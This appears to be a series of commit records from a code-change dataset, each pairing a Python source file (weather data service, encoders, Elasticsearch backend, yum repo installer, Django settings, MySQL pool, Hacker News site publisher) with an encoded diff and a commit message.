on (t.iemid = s.iemid) WHERE
s.day >= %s and s.day < %s and t.network = %s and t.id in %s
ORDER by day ASC""",
(sts, ets, network, tuple(stations)),
)
for row in cursor:
sio.write(
(
"%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,"
"%s,%s\n"
)
% (
row[0],
row[1],
row[2],
row[3],
row[4],
row[5],
row[6],
row[7],
row[8],
row[9],
row[10],
row[11],
climate[row[0]][row[1].strftime("%m%d")]["high"],
climate[row[0]][row[1].strftime("%m%d")]["low"],
climate[row[0]][row[1].strftime("%m%d")]["precip"],
row[12],
row[13],
row[14],
row[15],
row[16],
row[17],
row[18],
)
)
return sio.getvalue()
def application(environ, start_response):
"""See how we are called"""
form = parse_formvars(environ)
sts = datetime.date(
int(form.get("year1")), int(form.get("month1")), int(form.get("day1"))
)
ets = datetime.date(
int(form.get("year2")), int(form.get("month2")), int(form.get("day2"))
)
start_response("200 OK", [("Content-type", "text/plain")])
stations = form.getall("stations")
if not stations:
stations = form.getall("station")
if not stations:
return [b"ERROR: No stations specified for request"]
network = form.get("network")[:12]
return [get_data(network, sts, ets, stations).encode("ascii")]
|
Python
| 0.000001
|
@@ -308,16 +308,35 @@
(network
+, only_online=False
)%0A if
@@ -1932,18 +1932,23 @@
return
-%22%22
+climate
%0A sio
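Decoded, the two hunks make the failure logic actually fail visibly. A sketch of the post-commit state, abridged to the two touched spots:
def get_climate(network, stations):
    """Fetch the climatology for these stations"""
    # hunk 1: include offline stations when building the network table
    nt = NetworkTable(network, only_online=False)
    ...
def get_data(network, sts, ets, stations):
    """Go fetch data please"""
    climate = get_climate(network, stations)
    if not isinstance(climate, dict):
        # hunk 2: return the "ERROR: ..." string instead of an empty body,
        # so the caller sees why the request failed
        return climate
    ...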
|
7d89c9c3229ebd7d8b56edf211e7020c3fad29a0
|
add support for msgpack
|
utils/encoders.py
|
utils/encoders.py
|
# Copyright (C) 2015 SlimRoms Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
SUPPORTED_ENCODERS = {}
import json
def json_encode(obj, pretty=False):
kwargs = {}
if pretty:
kwargs['indent'] = 4
kwargs['separators'] = (',', ': ')
return json.dumps(obj, **kwargs).replace("</", "<\\/")
SUPPORTED_ENCODERS.update({
'json': {
'headers': (("Content-Type", "application/json; charset=UTF-8"),),
'encoder': json_encode
}
})
try:
import xmltodict
except ImportError:
pass
else:
def xml_encode(obj, pretty=False):
        if len(obj) != 1:  # xmltodict.unparse needs exactly one root element
            obj = {'root': obj}
return xmltodict.unparse(obj, pretty=pretty)
SUPPORTED_ENCODERS.update({
'xml': {
'headers': (("Content-Type", "application/xml; charset=UTF-8"),),
'encoder': xml_encode
}
})
try:
import yaml
except ImportError:
pass
else:
def yaml_encode(obj, pretty=False):
        return yaml.safe_dump(obj, default_flow_style=(not pretty))
SUPPORTED_ENCODERS.update({
'yaml': {
'headers': (("Content-Type", "text/yaml; charset=UTF-8"),),
'encoder': yaml_encode
}
})
|
Python
| 0
|
@@ -1679,28 +1679,428 @@
aml_encode%0A %7D%0A %7D)%0A
+%0A%0Atry:%0A try:%0A import msgpack%0A except ImportError:%0A import umsgpack as msgpack%0Aexcept ImportError:%0A pass%0Aelse:%0A def msgpack_encode(obj, pretty=False):%0A return msgpack.dumps(obj)%0A SUPPORTED_ENCODERS.update(%7B%0A 'msgpack': %7B%0A 'headers': ((%22Content-Type%22, %22application/msgpack; charset=UTF-8%22),),%0A 'encoder': msgpack_encode%0A %7D%0A %7D)%0A
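Decoded, the single hunk appends a msgpack section that mirrors the json/xml/yaml pattern above, with umsgpack as a pure-Python fallback:
try:
    try:
        import msgpack
    except ImportError:
        import umsgpack as msgpack
except ImportError:
    pass
else:
    def msgpack_encode(obj, pretty=False):
        return msgpack.dumps(obj)
    SUPPORTED_ENCODERS.update({
        'msgpack': {
            'headers': (("Content-Type", "application/msgpack; charset=UTF-8"),),
            'encoder': msgpack_encode
        }
    })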
|
745d3fae6b6055c731a47c13ef77e1faf1a4b7e5
|
upgrade elasticsearch mining backends
|
mining/db/backends/melasticsearch.py
|
mining/db/backends/melasticsearch.py
|
# -*- coding: utf-8 -*-
import json
from elasticsearch import Elasticsearch as ES
class Elasticsearch(object):
def conn(self):
"""Open connection on Elasticsearch DataBase"""
conn = ES([
{"host": self.conf.get('host'),
"port": self.conf.get('port'),
"url_prefix": self.conf.get('db')}
])
return conn
    def save(self, house, data, content_type=None):
        """Save meta data on Elasticsearch"""
if content_type == "application/json":
data = json.dumps(data)
return self.conn().index(index=house, doc_type='json', id=1,
body=data)
def get(self, house, content_type="application/json", callback={}):
"""Get meta data on Elasticsearch"""
data = self.conn().get(index=house, doc_type='json', id=1) or callback
if content_type == "application/json":
return json.loads(data['_source'])
return data['_source']
|
Python
| 0
|
@@ -29,16 +29,32 @@
rt json%0A
+import requests%0A
from ela
@@ -92,16 +92,59 @@
as ES%0A%0A
+from mining.utils.listc import listc_dict%0A%0A
%0Aclass E
@@ -351,56 +351,8 @@
rt')
-,%0A %22url_prefix%22: self.conf.get('db')
%7D%0A
@@ -430,12 +430,14 @@
ype=
-None
+'dict'
):%0A
@@ -493,91 +493,162 @@
-if content_type == %22application/json%22:%0A data = json.dumps(data)%0A
+requests.delete(%22http://%7B%7D:%7B%7D/%7B%7D%22.format(%0A self.conf.get('host'), self.conf.get('port'), house))%0A for obj in data.get('data'):%0A
retu
@@ -643,22 +643,18 @@
-return
+
self.co
@@ -680,74 +680,285 @@
use,
- doc_type='json', id=1,%0A body=data
+%0A doc_type='data'.format(house),%0A body=obj)%0A self.conn().index(index=house,%0A doc_type='columns',%0A body=%7B%22columns%22: data.get('columns')%7D)%0A return self.conn(
)%0A%0A
@@ -995,32 +995,20 @@
t_type=%22
-application/json
+dict
%22, callb
@@ -1069,20 +1069,21 @@
-data
+count
= self.
@@ -1089,18 +1089,20 @@
.conn().
-ge
+coun
t(index=
@@ -1121,155 +1121,1063 @@
ype=
-'json', id=1) or callback%0A if content_type == %22application/json%22:%0A return json.loads(data%5B'_source'%5D)%0A return data%5B'_source'%5D
+%22data%22).get('count')%0A doc_data = self.conn().search(index=house, doc_type='data',%0A body=self.filter(), size=count)%0A data = %7B%7D%0A %22%22%22%0A data%5B'data'%5D = %5Bobj.get(%22_source%22)%0A for obj in doc_data.get('hits').get('hits')%5D%0A %22%22%22%0A data%5B'data'%5D = listc_dict(doc_data.get('hits').get('hits'), %22_source%22)%0A doc_columns = self.conn().search(index=house, doc_type='columns',%0A body=self.filter())%0A data.update(doc_columns.get('hits').get('hits')%5B0%5D.get('_source'))%0A data%5B'count'%5D = count%0A return data%0A%0A def filter(self):%0A %22%22%22Generate dict to applay filter on Elasticsearch%22%22%22%0A filter = %7B%0A %22query%22: %7B%0A %22bool%22: %7B%0A %22should%22: %5B%0A %7B %22match%22: %7B %22country%22: %22Brazil%22%7D%7D,%0A %7B %22match%22: %7B %22full_name%22: %22Daniel Austin%22%7D%7D%0A %5D%0A %7D%0A %7D%0A %7D%0A filter = %7B%22query%22: %7B%22match_all%22 : %7B%7D%7D%7D%0A return filter
%0A
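Decoded, the hunks rework both methods around a document-per-row layout instead of one JSON blob under id=1. A sketch of the post-commit shape (abridged; the hunk's no-op 'data'.format(house) is shown as plain 'data', and the commented-out example filter is omitted):
import requests
from mining.utils.listc import listc_dict
def save(self, house, data, content_type='dict'):
    """Save meta data on Elasticsearch"""
    # drop the whole index, then re-index one document per data row
    requests.delete("http://{}:{}/{}".format(
        self.conf.get('host'), self.conf.get('port'), house))
    for obj in data.get('data'):
        self.conn().index(index=house, doc_type='data', body=obj)
    self.conn().index(index=house, doc_type='columns',
                      body={"columns": data.get('columns')})
    return self.conn()
def get(self, house, content_type="dict", callback={}):
    """Get meta data on Elasticsearch"""
    count = self.conn().count(index=house, doc_type="data").get('count')
    doc_data = self.conn().search(index=house, doc_type='data',
                                  body=self.filter(), size=count)
    data = {}
    data['data'] = listc_dict(doc_data.get('hits').get('hits'), "_source")
    doc_columns = self.conn().search(index=house, doc_type='columns',
                                     body=self.filter())
    data.update(doc_columns.get('hits').get('hits')[0].get('_source'))
    data['count'] = count
    return data
def filter(self):
    """Generate dict to apply a filter on Elasticsearch"""
    return {"query": {"match_all": {}}}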
|
00b96577e1c9e7e49319b50a4b9bd055231b0f57
|
Validate os version is supported
|
ContentScripts/systemprep-linuxyumrepoinstall.py
|
ContentScripts/systemprep-linuxyumrepoinstall.py
|
#!/usr/bin/env python
import boto
import re
import shutil
import sys
import urllib2
from boto.exception import BotoClientError
def download_file(url, filename, sourceiss3bucket=None):
"""
Download the file from `url` and save it locally under `filename`.
    :rtype: bool
:param url:
:param filename:
:param sourceiss3bucket:
"""
conn = None
if sourceiss3bucket:
bucket_name = url.split('/')[3]
key_name = '/'.join(url.split('/')[4:])
try:
conn = boto.connect_s3()
bucket = conn.get_bucket(bucket_name)
key = bucket.get_key(key_name)
key.get_contents_to_filename(filename=filename)
except (NameError, BotoClientError):
try:
bucket_name = url.split('/')[2].split('.')[0]
key_name = '/'.join(url.split('/')[3:])
bucket = conn.get_bucket(bucket_name)
key = bucket.get_key(key_name)
key.get_contents_to_filename(filename=filename)
except Exception as exc:
raise SystemError('Unable to download file from S3 bucket.\n'
'url = {0}\n'
'bucket = {1}\n'
'key = {2}\n'
'file = {3}\n'
'Exception: {4}'
.format(url, bucket_name, key_name,
filename, exc))
except Exception as exc:
raise SystemError('Unable to download file from S3 bucket.\n'
'url = {0}\n'
'bucket = {1}\n'
'key = {2}\n'
'file = {3}\n'
'Exception: {4}'
.format(url, bucket_name, key_name,
filename, exc))
print('Downloaded file from S3 bucket -- \n'
' url = {0}\n'
' filename = {1}'.format(url, filename))
else:
try:
response = urllib2.urlopen(url)
with open(filename, 'wb') as outfile:
shutil.copyfileobj(response, outfile)
except Exception as exc:
# TODO: Update `except` logic
raise SystemError('Unable to download file from web server.\n'
'url = {0}\n'
'filename = {1}\n'
'Exception: {2}'
.format(url, filename, exc))
print('Downloaded file from web server -- \n'
' url = {0}\n'
' filename = {1}'.format(url, filename))
return True
_supported_dists = ('amazon', 'centos', 'red hat')
_match_supported_dist = re.compile(r'^({0})'
'(?:[^0-9]+)'
'([\d]+[.][\d]+)'
'(?:.*)'
.format('|'.join(_supported_dists)))
_amazon_epel_versions = {
'2014.03' : '6',
'2014.09' : '6',
'2015.03' : '6',
}
def main(yumrepomap=None):
"""
Checks the distribution version and installs yum repo definition files
that are specific to that distribution.
:param yumrepomap: list of dicts, each dict contains two or three keys.
'url': the url to the yum repo definition file
'dist': the linux distribution to which the repo should
be installed. one of 'amazon', 'redhat',
'centos', or 'all'. 'all' is a special keyword
that maps to all distributions.
'epel_version': optional. match the major version of the
epel-release that applies to the
system. one of '6' or '7'. if not
specified, the repo is installed to all
systems.
Example: [ {
'url' : 'url/to/the/yum/repo/definition.repo',
'dist' : 'amazon' or 'redhat' or 'centos' or 'all',
                 'epel_version' : '6' or '7',
},
]
"""
if not yumrepomap:
print('`yumrepomap` is empty. Nothing to do!')
return None
if not isinstance(yumrepomap, list):
raise SystemError('`yumrepomap` must be a list!')
# Read first line from /etc/system-release
release = None
try:
with open(name='/etc/system-release', mode='rb') as f:
release = f.readline().strip()
except Exception as exc:
raise SystemError('Could not read /etc/system-release. '
'Error: {0}'.format(exc))
# Search the release file for a match against _supported_dists
m = _match_supported_dist.search(release.lower())
if m is None:
# Release not supported, exit with error
raise SystemError('Unsupported OS distribution. OS must be one of: '
'{0}.'.format(', '.join(_supported_dists)))
# Assign dist,version from the match groups tuple, removing any spaces
    dist, version = (x.translate(None, ' ') for x in m.groups())
# Determine epel_version
epel_version = None
if 'amazon' == dist:
epel_version = _amazon_epel_versions.get(version, None)
else:
epel_version = version.split('.')[0]
for repo in yumrepomap:
# Test whether this repo should be installed to this system
if repo['dist'] in [dist, 'all'] and repo.get('epel_version', 'all') \
in [epel_version, 'all']:
# Download the yum repo definition to /etc/yum.repos.d/
url = repo['url']
repofile = '/etc/yum.repos.d/{0}'.format(url.split('/')[-1])
download_file(url, repofile)
if __name__ == "__main__":
# Convert command line parameters of the form `param=value` to a dict
kwargs = dict(x.split('=', 1) for x in sys.argv[1:])
# Convert parameter keys to lowercase, parameter values are unmodified
kwargs = dict((k.lower(), v) for k, v in kwargs.items())
# Need to convert a string to a list of dicts,
# First, remove any parentheses or brackets
kwargs['yumrepomap'] = kwargs.get('yumrepomap', '').translate(None, '()[]')
# Then, split the string to form groups around {}
kwargs['yumrepomap'] = re.split('({.*?})', kwargs['yumrepomap'])
# Now remove empty/bad strings
kwargs['yumrepomap'] = [v for v in filter(None, kwargs['yumrepomap']) \
if not v == ', ']
# Remove braces and split on commas. it's now a list of lists
kwargs['yumrepomap'] = [v.translate(None, '{}').split(',') for v in \
kwargs['yumrepomap']]
# Convert to a list of dicts
kwargs['yumrepomap'] = [dict(x.split(':', 1) for x in y) for y in \
kwargs['yumrepomap']]
# Strip whitespace around the keys and values
kwargs['yumrepomap'] = [dict((k.strip(), v.strip()) for k, v in \
x.items()) for x in kwargs['yumrepomap']]
main(**kwargs)
|
Python
| 0
|
@@ -5617,16 +5617,175 @@
.')%5B0%5D%0A%0A
+ if epel_version is None:%0A raise SystemError('Unsupported OS version! dist = %7B0%7D, version = %7B1%7D.'%0A .format(dist, version))%0A%0A
for
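Decoded, the hunk inserts a guard between the epel_version computation and the repo loop, so a release string that maps to no known EPEL version raises instead of silently proceeding with epel_version = None:
        epel_version = version.split('.')[0]
    if epel_version is None:
        raise SystemError('Unsupported OS version! dist = {0}, version = {1}.'
                          .format(dist, version))
    for repo in yumrepomap: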
|
13152ede55f480533aead0bf6f573081edf2612f
|
update module path for CouchDBEmailBackend
|
mygpo/settings.py
|
mygpo/settings.py
|
# Django settings for mygpo project.
#
# This file is part of my.gpodder.org.
#
# my.gpodder.org is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version.
#
# my.gpodder.org is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public
# License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with my.gpodder.org. If not, see <http://www.gnu.org/licenses/>.
#
import os.path
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# http://code.djangoproject.com/wiki/BackwardsIncompatibleChanges#ChangedthewayURLpathsaredetermined
FORCE_SCRIPT_NAME=""
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = ()
MANAGERS = ADMINS
DATABASES = {
'default': {
'NAME': 'mygpo',
'ENGINE': 'django.db.backends.sqlite3',
'USER': '',
'PASSWORD': '',
'HOST': '',
}
}
COUCHDB_DATABASES = (
('mygpo.directory', 'http://127.0.0.1:5984/mygpo'),
('mygpo.core', 'http://127.0.0.1:5984/mygpo'),
('mygpo.users', 'http://127.0.0.1:5984/mygpo'),
('mygpo.maintenance', 'http://127.0.0.1:5984/mygpo'),
('django_couchdb_utils', 'http://127.0.0.1:5984/mygpo'),
)
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'UTC'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.abspath('%s/../htdocs/media/' % os.path.dirname(__file__))
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = ''
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/admin/'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.locale.LocaleMiddleware',
)
ROOT_URLCONF = 'mygpo.urls'
TEMPLATE_DIRS = ()
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.sessions',
'django.contrib.humanize',
'registration',
'couchdbkit.ext.django',
'django_couchdb_utils',
'mygpo.core',
'mygpo.users',
'mygpo.api',
'mygpo.web',
'mygpo.publisher',
'mygpo.data',
'mygpo.userfeeds',
'mygpo.directory',
'mygpo.maintenance',
)
TEST_EXCLUDE = (
'django',
'registration',
)
TEST_RUNNER='mygpo.test.MygpoTestSuiteRunner'
ACCOUNT_ACTIVATION_DAYS = 7
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'mygpo.web.auth.EmailAuthenticationBackend',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.contrib.messages.context_processors.messages",
"mygpo.web.googleanalytics.processor",
)
AUTH_PROFILE_MODULE = "api.UserProfile"
LOGIN_URL = '/login/'
CSRF_FAILURE_VIEW='mygpo.web.views.security.csrf_failure'
# The following entries should be set in settings_prod.py
DEFAULT_FROM_EMAIL = ''
SECRET_KEY = ''
GOOGLE_ANALYTICS_PROPERTY_ID=''
DIRECTORY_EXCLUDED_TAGS = ()
FLICKR_API_KEY = ''
MAINTENANCE = os.path.exists(os.path.join(BASE_DIR, 'MAINTENANCE'))
EMAIL_BACKEND = 'django_couchdb_utils.email.CouchDBEmailBackend'
try:
from settings_prod import *
except ImportError, e:
import sys
print >> sys.stderr, 'create settings_prod.py with your customized settings'
|
Python
| 0
|
@@ -4575,16 +4575,25 @@
s.email.
+backends.
CouchDBE
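The hunk is a one-word module-path fix; decoded, the setting becomes:
EMAIL_BACKEND = 'django_couchdb_utils.email.backends.CouchDBEmailBackend'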
|
bc1e350dd19d91932bbfff73f863129ac94273c9
|
bump version to 2.0.1
|
torment/information.py
|
torment/information.py
|
# Copyright 2015 Alex Brandt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
AUTHOR = 'Alex Brandt'
AUTHOR_EMAIL = 'alunduil@alunduil.com'
COPYRIGHT = '2015'
DESCRIPTION = 'A Study in Fixture Based Testing Frameworking'
LICENSE = 'Apache-2.0'
NAME = 'torment'
URL = 'https://github.com/kumoru/torment'
VERSION = '2.0.0'
|
Python
| 0
|
@@ -809,11 +809,11 @@
= '2.0.
-0
+1
'%0A
|
085d6cd31e8dce17a4d5c98085a03d8adf896bda
|
Fix transaction.execute args to kwargs
|
tornado_mysql/pools.py
|
tornado_mysql/pools.py
|
"""Connection pool"""
from __future__ import absolute_import, division, print_function
from collections import deque
import warnings
from tornado.ioloop import IOLoop
from tornado.gen import coroutine, Return
from tornado.concurrent import Future
from tornado_mysql import connect
from tornado_mysql.connections import Connection
DEBUG = False
def _debug(*msg):
if DEBUG:
print(*msg)
class Pool(object):
"""Connection pool like Golang's database/sql.DB.
This connection pool is based on autocommit mode.
    You can execute queries without managing connections yourself.
    When a transaction is necessary, you can check out a Transaction object.
"""
def __init__(self,
connect_kwargs,
max_idle_connections=1,
max_recycle_sec=3600,
max_open_connections=0,
io_loop=None,
):
"""
:param dict connect_kwargs: kwargs for tornado_mysql.connect()
:param int max_idle_connections: Max number of keeping connections.
:param int max_recycle_sec: How long connections are recycled.
:param int max_open_connections:
Max number of opened connections. 0 means no limit.
"""
connect_kwargs['autocommit'] = True
self.io_loop = io_loop or IOLoop.current()
self.connect_kwargs = connect_kwargs
self.max_idle = max_idle_connections
self.max_open = max_open_connections
self.max_recycle_sec = max_recycle_sec
self._opened_conns = 0
self._free_conn = deque()
self._waitings = deque()
def stat(self):
"""Returns (opened connections, free connections, waiters)"""
return (self._opened_conns, len(self._free_conn), len(self._waitings))
def _get_conn(self):
now = self.io_loop.time()
# Try to reuse in free pool
while self._free_conn:
conn = self._free_conn.popleft()
if now - conn.connected_time > self.max_recycle_sec:
self._close_async(conn)
continue
_debug("Reusing connection from pool:", self.stat())
fut = Future()
fut.set_result(conn)
return fut
# Open new connection
if self.max_open == 0 or self._opened_conns < self.max_open:
self._opened_conns += 1
_debug("Creating new connection:", self.stat())
return connect(**self.connect_kwargs)
        # Wait until another connection is released.
fut = Future()
self._waitings.append(fut)
return fut
def _put_conn(self, conn):
if (len(self._free_conn) < self.max_idle and
self.io_loop.time() - conn.connected_time < self.max_recycle_sec):
if self._waitings:
fut = self._waitings.popleft()
fut.set_result(conn)
_debug("Passing returned connection to waiter:", self.stat())
else:
self._free_conn.append(conn)
_debug("Add conn to free pool:", self.stat())
else:
self._close_async(conn)
def _close_async(self, conn):
self.io_loop.add_future(conn.close_async(), callback=self._after_close)
def _close_conn(self, conn):
conn.close()
self._after_close()
def _after_close(self, fut=None):
if self._waitings:
fut = self._waitings.popleft()
conn = Connection(**self.connect_kwargs)
cf = conn.connect()
self.io_loop.add_future(cf, callback=lambda f: fut.set_result(conn))
else:
self._opened_conns -= 1
_debug("Connection closed:", self.stat())
@coroutine
    def execute(self, query, params=None):
        """Execute a query in the pool.
        Returns a future yielding a closed cursor.
        You can get rows, lastrowid, etc. from the cursor.
:return: Future of cursor
:rtype: Future
"""
conn = yield self._get_conn()
try:
cur = conn.cursor()
yield cur.execute(query, params)
yield cur.close()
except:
self._close_conn(conn)
raise
else:
self._put_conn(conn)
raise Return(cur)
@coroutine
    def begin(self):
        """Start a transaction.
        Waits for a connection and returns a `Transaction` object.
:return: Future[Transaction]
:rtype: Future
"""
conn = yield self._get_conn()
try:
yield conn.begin()
except:
self._close_conn(conn)
raise
trx = Transaction(self, conn)
raise Return(trx)
class Transaction(object):
"""Represents transaction in pool"""
def __init__(self, pool, conn):
self._pool = pool
self._conn = conn
def _ensure_conn(self):
if self._conn is None:
raise Exception("Transaction is closed already")
def _close(self):
self._pool._put_conn(self._conn)
self._pool = self._conn = None
@coroutine
def execute(self, query, args):
"""
:return: Future[Cursor]
:rtype: Future
"""
self._ensure_conn()
cur = self._conn.cursor()
yield cur.execute(query, args)
raise Return(cur)
@coroutine
def commit(self):
self._ensure_conn()
yield self._conn.commit()
self._close()
@coroutine
def rollback(self):
self._ensure_conn()
yield self._conn.rollback()
self._close()
def __del__(self):
if self._pool is not None:
            warnings.warn("Transaction was not committed or rolled back.")
self._pool._close_conn(self._conn)
|
Python
| 0
|
@@ -5136,16 +5136,21 @@
ry, args
+=None
):%0A
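Decoded, the hunk gives Transaction.execute the same optional-args signature as Pool.execute, so parameterless queries no longer have to pass an explicit second argument:
    @coroutine
    def execute(self, query, args=None):  # post-commit signature
        self._ensure_conn()
        cur = self._conn.cursor()
        yield cur.execute(query, args)
        raise Return(cur)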
|
ef98508d878a724cccda3a9c81666759966bb879
|
fix mkdir
|
publish.py
|
publish.py
|
# #!/usr/bin/env python3
import json
import os
import functools
import concurrent.futures
from datetime import datetime
import re
from pathlib import Path
import time
import yaml
import asyncio
import logging
import aiohttp
import aiofiles
import subprocess
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
TEMPLATE = """\
---
{front_matter}
---
{content}
"""
def timing(f):
"""
    decorator to time a function and log its runtime
:param f: function to wrap
:return: wrapped function
"""
def wrap():
start = time.time()
f()
end = time.time()
logger.info(f"{f.__name__} took {end - start!r}")
return wrap
def slugify(name):
"""
    Takes an article name and returns a slug-appropriate version using hyphens
:param name: string to be converted
:return: converted string
"""
out = re.sub(r'[^\w\d\s]', '', name)
return re.sub(r'\s', '-', out)
async def write_file(data):
if data:
data_type = data.get('type', '')
if data_type == 'comment':
file_name = Path(f'./data/post/{data["id"]}.yaml')
data_out = yaml.dump(data)
else:
data_title = data.get('title', '')
            # if the title starts with 'Ask HN:' or 'Show HN:', set type to ask or show
match = re.match(r"^([A-Za-z]+)\s*HN\:.*$", data_title)
if match:
data_type = match.group(1).lower()
data['date'] = datetime.fromtimestamp(data.get('time')).isoformat()
data['linkurl'] = data.get('url')
data['slug'] = slugify(data_title)
data['tags'] = []
data['categories'] = [data_type] if data_type else []
for x in ('time', 'url', 'type'):
if x in data:
del data[x]
file_name = Path(f'./content/en/post/{data["slug"]}.md')
data_out = TEMPLATE.format(front_matter=yaml.dump(data).strip(), content="")
        # let's write the file if it doesn't exist
if file_name and not file_name.exists():
async with aiofiles.open(file_name, 'w') as f:
await f.write(data_out)
async def fetch(url, session, sem):
async with sem:
async with session.get(url, ssl=False) as response:
return await response.json()
async def worker(queue, session, sem):
while True:
json_data = None
# Get a "work item" out of the queue.
url = await queue.get()
# download the json, wait for at most 5 seconds
try:
json_data = await asyncio.wait_for(fetch(url, session, sem), timeout=5)
except asyncio.TimeoutError:
logger.info(f"Timeout for {url}")
# add back to queue for retry?
# await queue.put(queue_item)
# This data may add more to the queue lets check
if type(json_data) is list:
            # list of ids, e.g. [123, 456]
ids = json_data
elif type(json_data) is dict:
# an individual record lets add child records to the queue
ids = json_data.get('kids', [])
            # let's write this record to file asynchronously
await write_file(json_data)
else:
ids = []
for item_id in ids:
queue.put_nowait(f'https://hacker-news.firebaseio.com/v0/item/{item_id}.json')
# Notify the queue that the "work item" has been processed.
queue.task_done()
async def start(num_workers):
# Create a queue that we will use to store our "workload".
queue = asyncio.Queue()
# add initial urls to queue
for url in [f'https://hacker-news.firebaseio.com/v0/{name}.json' for name in
('topstories', 'askstories', 'showstories', 'jobstories')]:
queue.put_nowait(url)
tasks = []
conn = aiohttp.TCPConnector(ttl_dns_cache=300, limit=0)
sem = asyncio.Semaphore(100)
async with aiohttp.ClientSession(connector=conn) as session:
# Create worker tasks to process the queue concurrently.
for i in range(num_workers):
task = asyncio.create_task(worker(queue, session, sem))
tasks.append(task)
# Wait until the queue is fully processed.
await queue.join()
# Cancel our worker tasks.
for task in tasks:
task.cancel()
@timing
def main():
logger.info("Starting publish...")
num_workers = int(os.environ.get('num_workers', 100))
# create dirs
Path('./content/en/post/').mkdir(exist_ok=True)
Path('./data/post/').mkdir(exist_ok=True)
# Download all json and create files
asyncio.run(start(num_workers))
# asyncio.get_event_loop().run_until_complete(start(num_workers))
logger.info("Building site...")
subprocess.run(["hugo", "--verbose"])
if __name__ == '__main__':
main()
|
Python
| 0.000014
|
@@ -4535,32 +4535,46 @@
n/post/').mkdir(
+parents=True,
exist_ok=True)%0A
@@ -4603,16 +4603,30 @@
).mkdir(
+parents=True,
exist_ok
|
90ad8e104c339b923d9291916647391572fbced1
|
Bump version number
|
nassl/__init__.py
|
nassl/__init__.py
|
# -*- coding: utf-8 -*-
__author__ = 'Alban Diquet'
__version__ = '0.15.1'
|
Python
| 0.000002
|
@@ -69,10 +69,10 @@
'0.1
-5.1
+6.0
'%0A%0A
|
d60c61753d2d8d2384e678c7ad2050c32562c3cf
|
Fix potential problem with cli
|
pygreen.py
|
pygreen.py
|
#! /usr/bin/python
# PyGreen
# Copyright (c) 2013, Nicolas Vanhoren
#
# Released under the MIT license
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
# AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import unicode_literals
import bottle
import os.path
from mako.lookup import TemplateLookup
import os
import os.path
import wsgiref.handlers
import sys
import logging
import re
import argparse
import sys
import markdown
_logger = logging.getLogger(__name__)
class PyGreen:
def __init__(self):
# the Bottle application
self.app = bottle.Bottle()
# a set of strings that identifies the extension of the files
# that should be processed using Mako
self.template_exts = set(["html"])
# the folder where the files to serve are located. Do not set
# directly, use set_folder instead
self.folder = "."
# the TemplateLookup of Mako
self.templates = TemplateLookup(directories=[self.folder],
imports=["from markdown import markdown"],
input_encoding='iso-8859-1',
)
        # A list of regular expressions. Files whose names match
        # one of those regular expressions will not be output when generating
        # a static version of the web site
